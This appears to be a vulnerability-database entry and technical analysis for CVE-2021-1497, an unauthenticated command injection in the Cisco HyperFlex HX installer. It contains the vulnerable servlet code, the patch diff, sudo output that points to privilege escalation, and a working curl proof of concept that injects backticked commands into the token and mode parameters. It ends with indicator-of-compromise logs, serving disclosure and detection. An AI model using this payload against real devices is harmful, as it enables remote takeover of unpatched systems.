Attacker Value
High
CVE-2021-1497
CVE-2021-1497
(Last updated July 26, 2024) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Metasploit Module
Description
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Add Assessment
2
Technical Analysis
Attacker value is a little lower because I was able to test only the installer.
CVE-2021-1497/CVE-2021-1498
Command injection in the /storfs-asup endpoint’s token and mode parameters.
Patch
--- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ </servlet-mapping> <servlet> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class> - <load-on-startup>1</load-on-startup> - </servlet> - - <servlet-mapping> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <url-pattern>/storfs-asup/*</url-pattern> - </servlet-mapping> - - <servlet> <servlet-name>Springpath Upgrade Image Upload Service</servlet-name> <servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class> </servlet>
Vulnerability
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String action = request.getParameter("action"); if (action == null) { String msg = "Action for the servlet need be specified."; writeErrorResponse(response, msg); return; } try { String token = request.getParameter("token"); StringBuilder cmd = new StringBuilder(); cmd.append("exec /bin/storfs-asup "); cmd.append(token); String mode = request.getParameter("mode"); cmd.append(" "); cmd.append(mode); cmd.append(" > /dev/null"); logger.info("storfs-asup cmd to run : " + cmd); ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() }); logger.info("Starting the storfs-asup now: "); long startTime = System.currentTimeMillis(); Process p = pb.start(); InputStream errStream = p.getErrorStream(); String errMsg = FileUtils.readToString(errStream); int exitCode = p.waitFor(); long timeTaken = System.currentTimeMillis() - startTime; logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg); errStream.close(); OutputStream outStream = p.getOutputStream(); outStream.flush(); outStream.close(); if (exitCode != 0) throw new Exception(errMsg); } catch (IOException ex) { logger.error("Failed to generate asup: " + ex); } catch (Exception ie) { logger.error("Failed to run the /bin/storfs-asup command."); } finally { logger.info("Done executing asup command. "); } }
tomcat7@HyperFlex-Installer-4:~$ sudo -l Matching Defaults entries for tomcat7 on HyperFlex-Installer-4: !lecture, tty_tickets, !fqdn User tomcat7 may run the following commands on HyperFlex-Installer-4: (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help Usage: support.py [options] Options: -h, --help show this help message and exit -t TARGET, --target=TARGET Target directory where the support bundle should go (XXX: This could be a remote host(dir), ex: hostname:/foo). Optional. Default = /tmp -i INSTALLDIR, --installdir=INSTALLDIR Install directory for storfs. Optional. -k ZKDIR, --zkdir=ZKDIR zookeeper directory for storfs. Optional -l LOGDIR, --logdir=LOGDIR log directory for storfs. Optional --asupdir=ASUPDIR asup directory for storfs. Optional -c COREDIR, --coredir=COREDIR core directory for storfs. Optional -m MANIFESTDIR, --manifestdir=MANIFESTDIR Manifest directory for storfs support. All files with .mfx extension in this directory will be processed. Optional --list List the manifests. Optional -f MANIFESTFILES, --manifest-file=MANIFESTFILES Manifest file to use for generating support. Multiple manifest files can be specified. Manifests files are required to have .mfx suffix. Optional (Cannot be with -m option) -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR log directory for storfs binary files. Optional --hypervdir=HYPERVDIR log directory for hyperv binary files. Optional -o TOOLSDIR, --toolsdir=TOOLSDIR Path for storfs tools. Optional -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR Path for runtime dir (which contains storfs_running_process.pid files). Optional -b BUILDTYPE, --buildtype=BUILDTYPE Build type that was running. Optional. Default = debug -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES any additional files/directories (not in manifest) that should be added to the support bundle. Optional. --dry-run Process manifests to make sure that there are no errors tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx # Springpath manifest file. Contains just basic logs. # Simplified from springpath-mgmt.mfx ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"] ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"] ["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"] tomcat7@HyperFlex-Installer-4:~$
PoC
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`' * Trying 192.168.123.133... * TCP_NODELAY set * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0) > POST /storfs-asup HTTP/1.1 > Host: 192.168.123.133 > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 28 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 28 out of 28 bytes < HTTP/1.1 200 OK < Server: nginx/1.8.1 < Date: Tue, 18 May 2021 00:54:26 GMT < Content-Length: 0 < Connection: keep-alive < Front-End-Https: on < * Connection #0 to host 192.168.123.133 left intact * Closing connection 0 wvu@kharak:~$
IOCs
==> /var/log/nginx/access.log <== 192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1" ==> /var/log/springpath/stBootstrapGuiBackend.log <== 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command. ==> /var/log/tomcat7/catalina.out <== 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command. ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <== 127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- cisco
Products
- hyperflex hx data platform
Metasploit Modules
Exploited in the Wild
References
